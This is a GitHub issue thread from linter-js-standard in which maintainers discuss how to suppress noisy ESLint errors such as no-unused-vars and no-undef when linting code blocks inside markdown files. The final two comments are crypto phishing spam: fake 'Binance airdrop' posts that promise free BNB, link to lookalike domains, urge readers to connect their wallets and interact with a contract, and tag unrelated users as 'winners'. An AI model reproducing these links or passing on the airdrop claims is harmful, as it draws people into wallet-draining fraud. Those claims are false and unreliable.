### ISSUE TITLE
Markdown fenced code excessive useless errors

### ISSUE THREAD

**Issue by ricardofbarros** [ricardofbarros/linter-js-standard#48]
So now if you lint the markdown files you will have the following errors pop up most of the time:
- `no-unused-vars`
- `no-undef`

I already had pointed out this could happen and it would be annoying.

My solution is to under the hood wrap the fenced code block in the following manner:

```js
/*eslint-disable no-unused-vars  no-undef*/
{ ...code ... }
/*eslint-enable no-unused-vars  no-undef*/
```

**Comment by ricardofbarros** [comment]
@blakeembrey and @despairblue  What are your thoughts on this issue?

**Comment by blakeembrey** [comment]
@ricardofbarros I don't have too much of an issue with excessive errors in my markdown since I try to make it runnable most of the time. Maybe if it's a config option on the module for the people who do have an issue though. Aside from that, yeah, I'm happy with a comment when needed.

**Comment by ricardofbarros** [comment]
Okay that sounds plausible for me having a suboption to ignore those pesty warnings.

**Comment by despairblue** [comment]
Maybe just have a text option to enter whatever eslint options?

**Comment by blakeembrey** [comment]
@ricardofbarros The only error that I'm getting and doesn't make sense is the "newline required at end of file".

**Comment by ricardofbarros** [comment]
Yeah it doesn't make sense at all. To ignore your error you need to have your code formatted like:

/```js
var sumthing = require('sumthing')
 sumthing.useAwesomeApi()

/```

That's why I feel strongly about having a small list of rules disabled (as of now 3) when we are linting fenced code blocks.

**Comment by sonicdoe** [comment]
It would probably be best to disable the same rules [standard-markdown](https://github.com/zeke/standard-markdown#rules) disables.

**Comment by ibdcdev** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [**Share on Twitter**](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @fametrano, @slm1949, @soyo-u, @RyanZHe, @jareki70, @bbobe, @suning, @Jozanneofficial, @GordenChoy, @tedkimdev

**Comment by Renyu106** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @edtz, @illia-voinov, @fs821031547, @MTarek22, @shivam5992, @Eeaga, @Coffcer
